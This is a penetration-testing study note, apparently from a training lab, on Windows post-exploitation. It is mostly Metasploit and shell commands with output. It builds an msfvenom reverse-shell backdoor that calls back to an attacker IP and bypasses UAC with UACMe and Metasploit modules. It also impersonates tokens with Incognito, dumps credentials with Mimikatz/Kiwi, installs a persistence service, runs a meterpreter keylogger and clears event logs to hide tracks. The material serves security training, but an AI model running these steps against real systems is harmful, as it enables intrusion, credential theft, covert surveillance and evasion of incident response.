Windows Post Exploitation
Windows Post Exploitation
Sections in This Note
- Bypassing UAC with UACMe
- Bypassing User Access Control (UAC)
- Token Impersonation with Incognito
- The Incognito Module
- Dumping Hashes with MimiKatz
- Establishing Persistence on Windows
- Keylogging
- Windows Event Logs
Bypassing UAC with UACMe
UAC (User Account Control) is a Windows security feature introduced in Windows Vista that is used to prevent unauthorized changes from being made to the operating system. UAC ensures that changes to the OS require approval from the administrator or a user account that is part of the local administrators group. Attackers can bypass UAC in order to execute malicious executables with elevated privileges.
In order to successfully bypass UAC, we need access to a user account that is part of the local administrators group on the Windows target system.
Tools:
- UACMe: An open source, robust privilege escalation tool. https://github.com/hfiref0x/UACME
Step 10: Generate a malicious executable using msfvenom and run it on the target machine to gain administrator user privileges.
Note: Replace "10.10.1.3" with your local IP address.
Commands:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe'
file 'backdoor.exe'
Step 11: Switch the directory to the user's temp folder and upload Akagi64.exe and backdoor.exe.
Commands:
CTRL + C
cd C:\Users\admin\AppData\Local\Temp
upload /root/Desktop/tools/UACME/Akagi64.exe .
upload /root/backdoor.exe .
ls
Start another msfconsole and run a multi handler:
Commands:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.1.3
set LPORT 4444
exploit
meterpreter > migrate -N lsass.exe
[*] Migrating from 4132 to 768...
[*] Migration completed successfully.
meterpreter >
Switch back to the meterpreter and run the Akagi64.exe executable:
meterpreter > shell
Process 2928 created.
Channel 4 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\admin\AppData\Local\Temp>Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe
C:\Users\admin\AppData\Local\Temp>
Access Token Impersonation
Bypassing User Access Control (UAC)
UAC is a Windows security feature introduced in Windows Vista used to prevent unauthorized changes to the operating system, requiring approval from the administrator. We can use the "Windows Escalate UAC Protection Bypass (In Memory Injection)" module to bypass UAC by utilizing the trusted publisher certificate through process injection. It spawns a second shell with the UAC flag turned off.
service postgresql start
msfconsole
workspace -a windows_post
setg RHOSTS (IPaddress)
db_nmap -sV (IPaddress)
# (consider the target has rejetto vuln)
use exploit/windows/http/rejetto_hfs_exec
run
search bypassuac_injection
use exploit/windows/local/bypassuac_injection
set payload windows/x64/meterpreter/reverse_tcp
set session (session number)
run
Token Impersonation with Incognito
Windows Access Tokens
Windows access tokens are a core element of the authentication process on Windows, created and managed by LSASS. A Windows access token identifies and describes the security context of a process or thread. It can be thought of as a temporary key (akin to a web cookie) that provides users with access to a system/network resource without providing credentials each time a process starts. Access tokens are generated by winlogon.exe every time a user authenticates successfully, and include the identity and privileges of the associated user account. This token is attached to userinit.exe, and child processes started by the user inherit a copy of the access token and run under the same privileges.
Windows access tokens are categorized by security level:
- Impersonate-level tokens are created as a result of a non-interactive login on Windows, typically through specific system services or domain logons. Can only be used to impersonate a token on the local system, not external systems.
- Delegate-level tokens are typically created through an interactive login, primarily via traditional login or remote access protocols such as RDP. Pose the largest threat, since they can be used to impersonate tokens on any system.
Windows Privileges
The process of impersonating access tokens to elevate privileges depends on the privileges assigned to the compromised account, as well as the impersonation/delegation tokens available.
Privileges required for a successful impersonation attack:
- SeAssignPrimaryToken: Allows a user to impersonate tokens.
- SeCreateToken: Allows a user to create an arbitrary token with administrative privileges.
- SeImpersonatePrivilege: Allows a user to create a process under the security context of another user, typically with administrative privileges.
The Incognito Module
Incognito is a built-in meterpreter module (originally a standalone application) that allows you to impersonate user tokens after successful exploitation. We can use it to display a list of available tokens that we can impersonate.
msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.0.28.7
exploit
load incognito
list_tokens -u
impersonate_token ATTACKDEFENSE\\Administrator
Dumping Hashes with MimiKatz
Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows extraction of plaintext credentials from memory, password hashes from local SAM databases, and more. The SAM database is a database file on Windows systems that stores user passwords, used to authenticate users locally and remotely. We can use the pre-built mimikatz executable, or, if we have a meterpreter session, use the inbuilt meterpreter extension Kiwi, which allows us to dynamically execute Mimikatz on the target system without touching the disk.
meterpreter > migrate -N lsass.exe
[*] Migrating from 4132 to 768...
[*] Migration completed successfully.
meterpreter >
Load kiwi extension:
Command: load kiwi
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter >
- Dump Administrator NTLM hash:
creds_all - Extract all users' NTLM hashes:
lsa_dump_sam - Find the syskey by dumping LSA secrets:
lsa_dump_secrets
Establishing Persistence on Windows
Persistence consists of techniques adversaries use to keep access to systems across restarts, changed credentials, and other interruptions. Gaining an initial foothold isn't enough — you need to set up and maintain persistent access.
use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set SESSION 1
exploit
use multi/handler
Keylogging
Keylogging is the process of recording/capturing keystrokes entered on a target system. Not limited to post-exploitation — there are programs and USB devices for this too. Meterpreter on Windows provides the ability to capture keystrokes entered on a target system and download them back to our local system.
pgrep explorer
migrate 2312
keyscan_start
# (starts the keylogging)
keyscan_dump
Windows Event Logs
Windows stores and catalogs all actions/events performed on the system in the Windows Event Log. Categorized by type:
- Application logs: Application/program events like startups, crashes, etc.
- System logs: System events like startups, reboots, etc.
- Security logs: Security events like password changes, authentication failures, etc.
Event logs can be accessed via the Event Viewer, and are the first stop for any forensic investigator after a compromise. It's therefore very important to clear your tracks after finishing an assessment.
clearev